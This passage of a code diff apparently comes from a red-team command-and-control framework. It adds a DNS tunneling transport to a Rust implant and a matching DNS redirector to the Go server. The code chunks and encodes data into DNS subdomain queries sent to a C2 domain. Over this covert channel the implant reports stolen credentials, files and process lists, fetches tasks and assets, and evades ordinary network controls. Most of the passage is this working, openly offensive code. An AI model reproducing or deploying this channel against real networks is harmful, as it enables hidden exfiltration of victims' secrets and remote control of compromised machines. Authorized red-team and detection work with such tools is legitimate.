[method_code:2][total_chunks:5][crc:4] + async fn send_init( + &mut self, + method: &str, + total_chunks: usize, + data_crc: u16, + ) -> Result { + let method_code = method_to_code(method); + let temp_conv_id = Self::generate_conv_id(); + + let total_chunks_encoded = Self::encode_seq(total_chunks); + let crc_encoded = Self::encode_base36_crc(data_crc); + let init_payload = format!("{}{}{}", method_code, total_chunks_encoded, crc_encoded); + + #[cfg(debug_assertions)] + log::debug!( + "send_init: method={}, total_chunks={}, total_chunks_encoded={}, crc={}, crc_encoded={}, init_payload={}", + method, + total_chunks, + total_chunks_encoded, + data_crc, + crc_encoded, + init_payload + ); + + let subdomain = Self::build_init_packet(&temp_conv_id, &init_payload)?; + + #[cfg(debug_assertions)] + log::debug!("Init packet subdomain: {}.{}", subdomain, self.base_domain); + + for attempt in 0..MAX_RETRIES { + #[cfg(debug_assertions)] + log::debug!( + "Sending init packet, attempt {}/{}, timeout={}s", + attempt + 1, + MAX_RETRIES, + INIT_TIMEOUT_SECS + ); + + match tokio::time::timeout( + tokio::time::Duration::from_secs(INIT_TIMEOUT_SECS), + self.send_query(&subdomain), + ) + .await + { + Ok(Ok(response)) if !response.is_empty() => { + // Check if response is binary chunked indicator (magic byte 0xFF) + if response.len() >= 4 && response[0] == 0xFF { + // Binary chunked indicator format (for A records): + // Byte 0: 0xFF (magic) + // Bytes 1-2: chunk count (uint16 big-endian) + // Byte 3: CRC low byte + let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; + let crc_low = response[3]; + + #[cfg(debug_assertions)] + log::debug!( + "Init response is chunked (binary format), chunks={}, crc_low={}", + total_chunks, + crc_low + ); + + // Fetch conversation ID chunks using temp conv_id + // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking + let conv_id = self + .fetch_response_chunks(&temp_conv_id, total_chunks, 
crc_low as u16) + .await?; + + let conv_id_str = String::from_utf8_lossy(&conv_id).to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received chunked conversation ID: {}", conv_id_str); + + return Ok(conv_id_str); + } + + let response_str = String::from_utf8_lossy(&response).to_string(); + + // Check if response is text chunked indicator + if response_str.starts_with(RESP_CHUNKED) { + // Chunked conversation ID response (for A/AAAA records) + #[cfg(debug_assertions)] + log::debug!("Init response is chunked, parsing metadata"); + + let chunked_info = &response_str[RESP_CHUNKED.len()..]; + let parts: Vec<&str> = chunked_info.split(':').collect(); + + // Check if we have a complete chunked indicator (should have 2 parts: chunks and crc) + if parts.len() != 2 || parts[0].is_empty() || parts[1].is_empty() { + // Incomplete chunked indicator - this can happen with A records + // The indicator itself was truncated, so we need to fetch it + #[cfg(debug_assertions)] + log::debug!("Chunked indicator truncated, response: '{}', fetching full metadata", response_str); + + // For A/AAAA records, the chunked indicator might be split across multiple queries + // We need to piece together the full indicator by making fetch queries + // Use a special approach: concatenate responses until we have valid format + let mut full_indicator = response_str.clone(); + let mut fetch_seq = 0; + + // Try up to 10 fetches to get the full indicator + while fetch_seq < 10 { + let subdomain = + self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; + match self.send_query(&subdomain).await { + Ok(chunk_data) if !chunk_data.is_empty() => { + full_indicator + .push_str(&String::from_utf8_lossy(&chunk_data)); + + // Try to parse again + if let Some(chunked_start) = + full_indicator.find(RESP_CHUNKED) + { + let info = &full_indicator + [chunked_start + RESP_CHUNKED.len()..]; + let parts: Vec<&str> = info.split(':').collect(); + if parts.len() >= 2 + && !parts[0].is_empty() + && 
!parts[1].is_empty() + { + // We have a complete indicator now + match ( + Self::decode_seq(parts[0]), + Self::decode_seq(parts[1]), + ) { + (Ok(total_chunks), Ok(expected_crc)) => { + #[cfg(debug_assertions)] + log::debug!("Reconstructed full chunked indicator: chunks={}, crc={}", total_chunks, expected_crc); + + // Now fetch the actual conversation ID chunks + // Start from fetch_seq + 1 since we already consumed some fetches for metadata + let conv_id = self + .fetch_response_chunks( + &temp_conv_id, + total_chunks, + expected_crc as u16, + ) + .await?; + let conv_id_str = + String::from_utf8_lossy(&conv_id) + .to_string(); + + return Ok(conv_id_str); + } + _ => { + // Keep trying + } + } + } + } + + fetch_seq += 1; + } + _ => break, + } + } + + return Err(anyhow::anyhow!( + "Failed to reconstruct chunked indicator after {} fetches: {}", + fetch_seq, + full_indicator + )); + } + + let total_chunks = Self::decode_seq(parts[0])?; + let expected_crc = Self::decode_seq(parts[1])?; + + // Fetch conversation ID chunks using temp conv_id + let conv_id = self + .fetch_response_chunks(&temp_conv_id, total_chunks, expected_crc as u16) + .await?; + // Trim null bytes that may be padding from A/AAAA record responses + let conv_id_str = String::from_utf8_lossy(&conv_id) + .trim_end_matches('\0') + .to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received chunked conversation ID: {}", conv_id_str); + + return Ok(conv_id_str); + } else { + // Direct conversation ID response (single packet) + // For A/AAAA records, may have null padding + let trimmed = response_str.trim_end_matches('\0').to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received conversation ID: {}", trimmed); + + return Ok(trimmed); + } + } + Ok(Ok(_)) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: server returned empty response", + attempt + 1 + ); + } + Ok(Err(e)) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: send_query failed: {}", + 
attempt + 1, + e + ); + } + Err(_) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: timeout after {}s", + attempt + 1, + INIT_TIMEOUT_SECS + ); + } + } + + if attempt < MAX_RETRIES - 1 { + let delay = 1 << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s + #[cfg(debug_assertions)] + log::debug!("Waiting {}s before retry...", delay); + tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; + } + } + + Err(anyhow::anyhow!( + "Failed to get conversation ID after {} retries", + MAX_RETRIES + )) + } + + async fn send_chunks( + &mut self, + conv_id: &str, + chunks: &[Vec], + total_chunks_declared: usize, + ) -> Result<()> { + for (idx, chunk) in chunks.iter().enumerate() { + // Don't send more chunks than declared in init + if idx >= total_chunks_declared { + #[cfg(debug_assertions)] + log::error!( + "BUG: Attempted to send chunk {} but only declared {} chunks in init packet", + idx, + total_chunks_declared + ); + break; + } + + let subdomain = self.build_packet(TYPE_DATA, idx, conv_id, chunk)?; + self.send_query(&subdomain).await?; + } + + Ok(()) + } + + /// Send end packet and get server response + async fn send_end(&mut self, conv_id: &str, last_seq: usize) -> Result> { + let subdomain = self.build_packet(TYPE_END, last_seq, conv_id, &[])?; + + for attempt in 0..MAX_RETRIES { + #[cfg(debug_assertions)] + log::debug!( + "Sending end packet, attempt {}/{}", + attempt + 1, + MAX_RETRIES + ); + + match tokio::time::timeout( + tokio::time::Duration::from_secs(CHUNK_TIMEOUT_SECS), + self.send_query(&subdomain), + ) + .await + { + Ok(Ok(response)) if !response.is_empty() => { + return Ok(response); + } + _ => { + if attempt < MAX_RETRIES - 1 { + tokio::time::sleep(tokio::time::Duration::from_secs(2)).await; + } + } + } + } + + Err(anyhow::anyhow!( + "Failed to get server response after {} retries", + MAX_RETRIES + )) + } + + /// Parse server response and handle missing chunks + async fn handle_response( + &mut self, + conv_id: &str, + 
response: &[u8], + chunks: &[Vec], + retry_count: usize, + ) -> Result> { + const MAX_MISSING_CHUNK_RETRIES: usize = 5; + + // Check if response is binary chunked indicator (magic byte 0xFF) + if response.len() >= 4 && response[0] == 0xFF { + // Binary chunked indicator format (for A records): + // Byte 0: 0xFF (magic) + // Bytes 1-2: chunk count (uint16 big-endian) + // Byte 3: CRC low byte + let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; + let crc_low = response[3]; + + #[cfg(debug_assertions)] + log::debug!( + "Response is chunked (binary format), chunks={}, crc_low={}", + total_chunks, + crc_low + ); + + // Fetch all response chunks + // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking + let data = self + .fetch_response_chunks(conv_id, total_chunks, crc_low as u16) + .await?; + + return Ok(data); + } + + let response_str = String::from_utf8_lossy(response); + + // Check response type + if response_str.starts_with(RESP_OK) { + // Success - decode response data + let response_data = &response_str[RESP_OK.len()..]; + return Self::decode_base32(response_data); + } else if response_str.starts_with(RESP_MISSING) { + if retry_count >= MAX_MISSING_CHUNK_RETRIES { + return Err(anyhow::anyhow!( + "Exceeded maximum retries ({}) for missing chunks", + MAX_MISSING_CHUNK_RETRIES + )); + } + + // Missing chunks - parse and resend + let missing_str = &response_str[RESP_MISSING.len()..]; + let missing_seqs: Result> = missing_str + .split(',') + .filter(|s| !s.is_empty()) + .map(|s| Self::decode_seq(s)) + .collect(); + + let missing_seqs = missing_seqs?; + + #[cfg(debug_assertions)] + log::debug!( + "Server reports {} missing chunks: {:?}", + missing_seqs.len(), + missing_seqs + ); + + // Resend missing chunks + for seq in &missing_seqs { + if *seq < chunks.len() { + let subdomain = self.build_packet(TYPE_DATA, *seq, conv_id, &chunks[*seq])?; + self.send_query(&subdomain).await?; + } else { + 
#[cfg(debug_assertions)] + log::warn!( + "Server requested chunk {} but we only have {} chunks", + seq, + chunks.len() + ); + } + } + + // Small delay to let resent chunks arrive before sending end packet again + tokio::time::sleep(tokio::time::Duration::from_millis(50)).await; + + // Retry end packet + let last_seq = chunks.len().saturating_sub(1); + let response = self.send_end(conv_id, last_seq).await?; + + // Recursive retry with incremented counter + return Box::pin(self.handle_response(conv_id, &response, chunks, retry_count + 1)) + .await; + } else if response_str.starts_with(RESP_CHUNKED) { + // Response is chunked - fetch all chunks + // For A/AAAA records, response may be padded with nulls + let chunked_info = response_str[RESP_CHUNKED.len()..].trim_end_matches('\0'); + let parts: Vec<&str> = chunked_info.split(':').collect(); + + if parts.len() != 2 { + return Err(anyhow::anyhow!("Invalid chunked response format")); + } + + let total_chunks = Self::decode_seq(parts[0])?; + let expected_crc = Self::decode_base36_crc(parts[1])?; + + #[cfg(debug_assertions)] + log::debug!( + "Response is chunked: {} chunks, CRC={}", + total_chunks, + expected_crc + ); + + // Fetch all response chunks + return self + .fetch_response_chunks(conv_id, total_chunks, expected_crc) + .await; + } else if response_str.starts_with(RESP_ERROR) { + return Err(anyhow::anyhow!("Server error: {}", response_str)); + } + + Err(anyhow::anyhow!("Unknown server response")) + } + + /// Fetch chunked response from server + /// For binary (A/AAAA): expected_crc is low byte only (0-255) + /// For text (TXT): expected_crc is full 16-bit CRC + async fn fetch_response_chunks( + &mut self, + conv_id: &str, + total_chunks: usize, + expected_crc: u16, + ) -> Result> { + // TXT uses base32-encoded text, A/AAAA use raw bytes + let is_text_chunking = self.current_record_type == TXT_RECORD_TYPE; + + let mut encoded_response = String::new(); + let mut binary_response = Vec::new(); + + // Fetch each chunk + 
for seq in 0..total_chunks { + let subdomain = self.build_packet(TYPE_FETCH, seq, conv_id, &[])?; + let response = self.send_query(&subdomain).await?; + + if is_text_chunking { + // TXT records: response is "ok:" prefix + base32 data + let response_str = String::from_utf8_lossy(&response); + if !response_str.starts_with(RESP_OK) { + return Err(anyhow::anyhow!( + "Failed to fetch chunk {}: {}", + seq, + response_str + )); + } + let chunk_data = &response_str[RESP_OK.len()..]; + encoded_response.push_str(chunk_data); + } else { + // A/AAAA records: response is raw binary data (no prefix) + // Trim null bytes from AAAA padding (16-byte alignment) + let trimmed_end = response + .iter() + .rposition(|&b| b != 0) + .map(|i| i + 1) + .unwrap_or(0); + binary_response.extend_from_slice(&response[..trimmed_end]); + } + } + + // Send final fetch to signal cleanup (seq = total_chunks) + let subdomain = self.build_packet(TYPE_FETCH, total_chunks, conv_id, &[])?; + let _ = self.send_query(&subdomain).await; // Ignore response + + #[cfg(debug_assertions)] + if is_text_chunking { + log::debug!( + "Fetched all {} chunks, total encoded size: {}", + total_chunks, + encoded_response.len() + ); + } else { + log::debug!( + "Fetched all {} chunks, total binary size: {}", + total_chunks, + binary_response.len() + ); + } + + // Decode based on chunking type + let decoded = if is_text_chunking { + // TXT: Decode base32 + Self::decode_base32(&encoded_response)? 
+ } else { + // A/AAAA: Already binary + binary_response + }; + + // Verify CRC + let actual_crc = Self::calculate_crc16(&decoded); + + // For binary chunking (A/AAAA), we only have the low byte of the CRC + // For text chunking (TXT), we have the full 16-bit CRC + let crc_match = if is_text_chunking { + actual_crc == expected_crc + } else { + (actual_crc & 0xFF) == (expected_crc & 0xFF) + }; + + if !crc_match { + return Err(anyhow::anyhow!( + "CRC mismatch on chunked response: expected {}, got {} (low byte check: {})", + expected_crc, + actual_crc, + if is_text_chunking { + "full" + } else { + "low byte only" + } + )); + } + + #[cfg(debug_assertions)] + log::debug!( + "Successfully reassembled chunked response, {} bytes", + decoded.len() + ); + + Ok(decoded) + } + + /// Perform a complete request-response cycle via DNS + /// Perform a DNS-based RPC exchange with automatic retry on failure + async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { + let mut last_error = None; + + for attempt in 0..EXCHANGE_MAX_RETRIES { + match self.dns_exchange_attempt(method, data).await { + Ok(response) => { + #[cfg(debug_assertions)] + if attempt > 0 { + log::info!( + "DNS exchange succeeded on attempt {}/{}", + attempt + 1, + EXCHANGE_MAX_RETRIES + ); + } + return Ok(response); + } + Err(e) => { + #[cfg(debug_assertions)] + log::warn!( + "DNS exchange attempt {}/{} failed: {}", + attempt + 1, + EXCHANGE_MAX_RETRIES, + e + ); + + last_error = Some(e); + + if attempt < EXCHANGE_MAX_RETRIES - 1 { + // Exponential backoff: 3s, 6s, 12s, 24s + let delay = EXCHANGE_RETRY_DELAY_SECS * (1 << attempt); + + #[cfg(debug_assertions)] + log::info!("Retrying DNS exchange in {} seconds...", delay); + + tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; + } + } + } + } + + Err(last_error.unwrap_or_else(|| { + anyhow::anyhow!( + "DNS exchange failed after {} attempts", + EXCHANGE_MAX_RETRIES + ) + })) + } + + /// Internal implementation of DNS exchange (single 
attempt) + async fn dns_exchange_attempt(&mut self, method: &str, data: &[u8]) -> Result> { + // Lazy initialize socket + if self.socket.is_none() { + let socket = UdpSocket::bind("0.0.0.0:0") + .await + .context("Failed to create UDP socket")?; + self.socket = Some(std::sync::Arc::new(socket)); + } + + // Calculate CRC16 of the data + let data_crc = Self::calculate_crc16(data); + + #[cfg(debug_assertions)] + log::debug!( + "DNS exchange: method={}, data_len={}, crc={}", + method, + data.len(), + data_crc + ); + + // Calculate max data size based on domain length + let max_data_size = self.calculate_max_data_size(); + + // Split RAW BINARY data into chunks (no base32 encoding yet) + let chunks: Vec> = data + .chunks(max_data_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + let total_chunks = chunks.len(); + + #[cfg(debug_assertions)] + log::debug!( + "DNS exchange: chunks={}, max_data_size={}", + total_chunks, + max_data_size + ); + + // Step 1: Send init packet and get conversation ID + let conv_id = self.send_init(method, total_chunks, data_crc).await?; + + // Step 2: Send data chunks + self.send_chunks(&conv_id, &chunks, total_chunks).await?; + + // Step 3: Send end packet and get response + let last_seq = total_chunks.saturating_sub(1); + let response = self.send_end(&conv_id, last_seq).await?; + + // Step 4: Handle response (including retries for missing chunks) + self.handle_response(&conv_id, &response, &chunks, 0).await + } + + /// Perform a unary RPC call via DNS + async fn unary_rpc(&mut self, request: Req, path: &str) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + // Marshal and encrypt request + let request_bytes = marshal_with_codec::(request)?; + + // Send via DNS + let response_bytes = self.dns_exchange(path, &request_bytes).await?; + + // Unmarshal and decrypt response + unmarshal_with_codec::(&response_bytes) + } +} + +impl Transport for DNS { + fn init() -> Self { + DNS { + dns_server: 
None, + base_domain: String::new(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + } + } + + fn new(callback: String, _proxy_uri: Option) -> Result { + // URL format: dns:///[?type=TXT|A|AAAA&fallback=true|false] + // Examples: + // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback + // dns://*/c2.example.com?type=A - System resolver, prefer A records + // dns://*/c2.example.com?fallback=false - TXT only, no fallback + let url = callback.trim_start_matches("dns://"); + + // Split URL and query params + let (server_domain, query_params) = if let Some(idx) = url.find('?') { + (&url[..idx], Some(&url[idx + 1..])) + } else { + (url, None) + }; + + let parts: Vec<&str> = server_domain.split('/').collect(); + + if parts.len() != 2 { + return Err(anyhow::anyhow!( + "Invalid DNS callback format. Expected: dns:///[?options]" + )); + } + + let dns_server = if parts[0] == "*" { + // Use system resolver + None + } else if parts[0].contains(':') { + Some(parts[0].to_string()) + } else { + Some(format!("{}:53", parts[0])) + }; + + let base_domain = parts[1].to_string(); + + // Parse query parameters + let mut preferred_record_type = TXT_RECORD_TYPE; + let mut enable_fallback = true; + + if let Some(params) = query_params { + for param in params.split('&') { + if let Some((key, value)) = param.split_once('=') { + match key { + "type" => { + preferred_record_type = match value.to_uppercase().as_str() { + "TXT" => TXT_RECORD_TYPE, + "A" => A_RECORD_TYPE, + "AAAA" => AAAA_RECORD_TYPE, + _ => { + return Err(anyhow::anyhow!( + "Invalid record type: {}. Expected TXT, A, or AAAA", + value + )) + } + }; + } + "fallback" => { + enable_fallback = match value.to_lowercase().as_str() { + "true" | "1" | "yes" => true, + "false" | "0" | "no" => false, + _ => { + return Err(anyhow::anyhow!( + "Invalid fallback value: {}. 
Expected true or false", + value + )) + } + }; + } + _ => {} // Ignore unknown parameters + } + } + } + } + + Ok(DNS { + dns_server, + base_domain, + socket: None, + preferred_record_type, + current_record_type: preferred_record_type, // Start with preferred type + enable_fallback, + }) + } + + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + self.unary_rpc(request, CLAIM_TASKS_PATH).await + } + + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + tx: Sender, + ) -> Result<()> { + #[cfg(debug_assertions)] + let filename = request.name.clone(); + + // Marshal request + let request_bytes = marshal_with_codec::(request)?; + + // Send via DNS and get streaming response + let response_bytes = self.dns_exchange(FETCH_ASSET_PATH, &request_bytes).await?; + + // For streaming responses, we need to chunk them + // The response contains multiple FetchAssetResponse messages concatenated + let mut offset = 0; + while offset < response_bytes.len() { + if offset + 4 > response_bytes.len() { + break; + } + + // Read message length (first 4 bytes) + let msg_len = u32::from_be_bytes([ + response_bytes[offset], + response_bytes[offset + 1], + response_bytes[offset + 2], + response_bytes[offset + 3], + ]) as usize; + offset += 4; + + if offset + msg_len > response_bytes.len() { + break; + } + + // Decrypt and decode message + match unmarshal_with_codec::( + &response_bytes[offset..offset + msg_len], + ) { + Ok(msg) => { + if tx.send(msg).is_err() { + #[cfg(debug_assertions)] + log::error!("Failed to send asset chunk: {}", filename); + break; + } + } + Err(_err) => { + #[cfg(debug_assertions)] + log::error!( + "Failed to decrypt/decode asset chunk: {}: {}", + filename, + _err + ); + break; + } + } + + offset += msg_len; + } + + Ok(()) + } + + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + self.unary_rpc(request, REPORT_CREDENTIAL_PATH).await + } + + async fn report_file( + &mut self, + request: 
Receiver, + ) -> Result { + #[cfg(debug_assertions)] + log::debug!("report_file: starting to collect chunks"); + + // Spawn a task to collect chunks from the sync channel receiver + // This is necessary because iterating over the sync receiver would block the async task + let handle = tokio::spawn(async move { + let mut all_chunks = Vec::new(); + let mut chunk_count = 0; + + // Iterate over the sync channel receiver in a spawned task to avoid blocking + for chunk in request { + chunk_count += 1; + let chunk_bytes = + marshal_with_codec::(chunk)?; + all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); + all_chunks.extend_from_slice(&chunk_bytes); + } + + #[cfg(debug_assertions)] + log::debug!( + "report_file: collected {} chunks, total {} bytes", + chunk_count, + all_chunks.len() + ); + + Ok::, anyhow::Error>(all_chunks) + }); + + // Wait for the spawned task to complete + let all_chunks = handle + .await + .context("Failed to join chunk collection task")??; + + // Send via DNS + let response_bytes = self.dns_exchange(REPORT_FILE_PATH, &all_chunks).await?; + + #[cfg(debug_assertions)] + log::debug!( + "report_file: received response, {} bytes", + response_bytes.len() + ); + + // Unmarshal response + unmarshal_with_codec::(&response_bytes) + } + + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + self.unary_rpc(request, REPORT_PROCESS_LIST_PATH).await + } + + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + self.unary_rpc(request, REPORT_TASK_OUTPUT_PATH).await + } + + async fn reverse_shell( + &mut self, + _rx: tokio::sync::mpsc::Receiver, + _tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + Err(anyhow::anyhow!( + "DNS transport does not support reverse shell" + )) + } +} diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 7ccff652b..247210170 100644 --- a/implants/lib/transport/src/lib.rs +++ 
b/implants/lib/transport/src/lib.rs @@ -1,7 +1,13 @@ #[cfg(all(feature = "grpc", feature = "http1"))] compile_error!("only one transport may be selected"); +#[cfg(all(feature = "grpc", feature = "dns"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "dns"))] +compile_error!("only one transport may be selected"); #[cfg(all(feature = "grpc-doh", feature = "http1"))] compile_error!("grpc-doh is only supported by the grpc transport"); +#[cfg(all(feature = "grpc-doh", feature = "dns"))] +compile_error!("grpc-doh is only supported by the grpc transport"); #[cfg(feature = "grpc")] mod grpc; @@ -16,6 +22,11 @@ mod http; #[cfg(feature = "http1")] pub use http::HTTP as ActiveTransport; +#[cfg(feature = "dns")] +mod dns; +#[cfg(feature = "dns")] +pub use dns::DNS as ActiveTransport; + #[cfg(feature = "mock")] mod mock; #[cfg(feature = "mock")] diff --git a/tavern/app.go b/tavern/app.go index a659f2ae5..24edec60d 100644 --- a/tavern/app.go +++ b/tavern/app.go @@ -41,6 +41,7 @@ import ( _ "realm.pub/tavern/internal/redirectors/grpc" _ "realm.pub/tavern/internal/redirectors/http1" + _ "realm.pub/tavern/internal/redirectors/dns" ) func init() { diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go new file mode 100644 index 000000000..563bf2d7a --- /dev/null +++ b/tavern/internal/redirectors/dns/dns.go @@ -0,0 +1,1047 @@ +package dns + +import ( + "context" + "encoding/base32" + "encoding/binary" + "fmt" + "log/slog" + "math/rand" + "net" + "net/url" + "strings" + "sync" + "time" + + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/metadata" + "google.golang.org/grpc/status" + "realm.pub/tavern/internal/redirectors" +) + +const ( + // DNS protocol limits + dnsHeaderSize = 12 // Standard DNS header size + maxLabelLength = 63 // Maximum bytes in a DNS label + txtRecordType = 16 // TXT record QTYPE + dnsClassIN = 1 // Internet class + defaultUDPPort = "53" + 
convTimeout = 15 * time.Minute // Conversation expiration + + // Protocol field sizes (base36 encoding) + typeSize = 1 // Packet type: i/d/e/f + seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks + convIDSize = 12 // Conversation ID length + headerSize = typeSize + seqSize + convIDSize + + // Packet types + typeInit = 'i' // Init: establish conversation + typeData = 'd' // Data: send chunk + typeEnd = 'e' // End: finalize and process + typeFetch = 'f' // Fetch: retrieve response chunk + + // Response prefixes (TXT records) + respOK = "ok:" // Success with data + respMissing = "m:" // Missing chunks list + respError = "e:" // Error message + respChunked = "r:" // Response chunked metadata + + // Response size limits (to fit in single UDP packet) + maxDNSResponseSize = 1400 // Conservative MTU limit + maxResponseChunkSize = 1200 // Base32-encoded chunk size +) + +func init() { + redirectors.Register("dns", &Redirector{}) +} + +func min(a, b int) int { + if a < b { + return a + } + return b +} + +// Redirector handles DNS-based C2 communication +type Redirector struct { + conversations sync.Map // conv_id -> *Conversation + baseDomains []string // Accepted base domains for queries +} + +// Conversation tracks state for a request-response exchange +type Conversation struct { + mu sync.Mutex + id string + methodPath string // gRPC method path + totalChunks int // Expected number of request chunks + expectedCRC uint16 // CRC16 of complete request data + chunks map[int][]byte // Received request chunks + lastActivity time.Time + + // Response chunking (for large responses) + responseData []byte + responseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) + responseCRC uint16 + isBinaryChunking bool // true for A/AAAA, false for TXT +} + +func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { + listenAddr, domains, err := parseListenAddr(listenOn) + if err != nil { + return fmt.Errorf("failed to parse listen 
address: %w", err) + } + + if len(domains) == 0 { + return fmt.Errorf("no base domains specified in listenOn parameter") + } + + r.baseDomains = domains + + udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + return fmt.Errorf("failed to resolve UDP address: %w", err) + } + + conn, err := net.ListenUDP("udp", udpAddr) + if err != nil { + return fmt.Errorf("failed to listen on UDP: %w", err) + } + defer conn.Close() + + slog.Info("DNS redirector started", "listen_on", listenAddr, "base_domains", r.baseDomains) + + go r.cleanupConversations(ctx) + + buf := make([]byte, 4096) + for { + select { + case <-ctx.Done(): + return ctx.Err() + default: + conn.SetReadDeadline(time.Now().Add(1 * time.Second)) + + n, addr, err := conn.ReadFromUDP(buf) + if err != nil { + if netErr, ok := err.(net.Error); ok && netErr.Timeout() { + continue + } + slog.Error("failed to read UDP packet", "error", err) + continue + } + + go r.handleDNSQuery(ctx, conn, addr, buf[:n], upstream) + } + } +} + +// parseListenAddr extracts address and domain parameters from listenOn string +// Format: "addr:port?domain=example.com&domain=other.com" +func parseListenAddr(listenOn string) (string, []string, error) { + parts := strings.SplitN(listenOn, "?", 2) + addr := parts[0] + + if !strings.Contains(addr, ":") { + addr = net.JoinHostPort(addr, defaultUDPPort) + } + + if len(parts) == 1 { + return addr, nil, nil + } + + queryParams := parts[1] + domains := []string{} + + for _, param := range strings.Split(queryParams, "&") { + kv := strings.SplitN(param, "=", 2) + if len(kv) != 2 { + continue + } + + key := kv[0] + value := kv[1] + + if key == "domain" && value != "" { + decoded, err := url.QueryUnescape(value) + if err != nil { + return "", nil, fmt.Errorf("failed to decode domain value: %w", err) + } + domains = append(domains, decoded) + } + } + + return addr, domains, nil +} + +func (r *Redirector) cleanupConversations(ctx context.Context) { + ticker := time.NewTicker(1 * 
time.Minute) + defer ticker.Stop() + + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + now := time.Now() + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.lastActivity) > convTimeout { + r.conversations.Delete(key) + slog.Debug("conversation expired", "conv_id", conv.id) + } + conv.mu.Unlock() + return true + }) + } + } +} + +func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr *net.UDPAddr, query []byte, upstream *grpc.ClientConn) { + if len(query) < dnsHeaderSize { + slog.Debug("query too short") + return + } + + transactionID := binary.BigEndian.Uint16(query[0:2]) + + domain, queryType, err := r.parseDomainNameAndType(query[dnsHeaderSize:]) + if err != nil { + slog.Debug("failed to parse domain", "error", err) + return + } + + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + domainParts := strings.Split(domain, ".") + var subdomainParts []string + var matchedBaseDomain string + + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") + + if len(domainParts) <= len(baseDomainParts) { + continue + } + + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break + } + } + + if matched { + subdomainParts = domainParts[:len(domainParts)-len(baseDomainParts)] + matchedBaseDomain = baseDomain + break + } + } + + if matchedBaseDomain == "" { + slog.Debug("domain doesn't match any configured base domains", "domain", domain, "base_domains", r.baseDomains) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + if len(subdomainParts) < 1 { + slog.Debug("no subdomain found", "domain", domain, "matched_base_domain", matchedBaseDomain) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // 
Reassemble all subdomain labels (they form a base32-encoded packet) + fullSubdomain := strings.Join(subdomainParts, "") + + // Decode base32 to get raw packet bytes + packetBytes, err := decodeBase32(fullSubdomain) + if err != nil { + slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Parse packet: [type:1][seq:5][convid:12][data...] + if len(packetBytes) < headerSize { + slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + pktType := rune(packetBytes[0]) + seqStr := string(packetBytes[typeSize : typeSize+seqSize]) + convID := string(packetBytes[typeSize+seqSize : headerSize]) + data := packetBytes[headerSize:] // Keep as []byte, don't convert to string + + slog.Debug("parsed packet", "type", string(pktType), "seq_str", seqStr, "conv_id", convID, "data_len", len(data), "total_packet_len", len(packetBytes)) + + seq, err := decodeSeq(seqStr) + if err != nil { + slog.Debug("invalid sequence", "seq", seqStr, "error", err) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + var responseData []byte + switch pktType { + case typeInit: + responseData, err = r.handleInitPacket(convID, string(data)) + case typeData: + responseData, err = r.handleDataPacket(convID, seq, data) + case typeEnd: + responseData, err = r.handleEndPacket(ctx, upstream, convID, seq, queryType) + case typeFetch: + responseData, err = r.handleFetchPacket(convID, seq) + default: + err = fmt.Errorf("unknown packet type: %c", pktType) + } + + if err != nil { + slog.Error("failed to handle packet", "type", string(pktType), "error", err) + errorResp := fmt.Sprintf("%s%s", respError, err.Error()) + r.sendDNSResponse(conn, addr, transactionID, domain, []byte(errorResp), queryType) + return + } + + var maxCapacity int + switch queryType { + case 
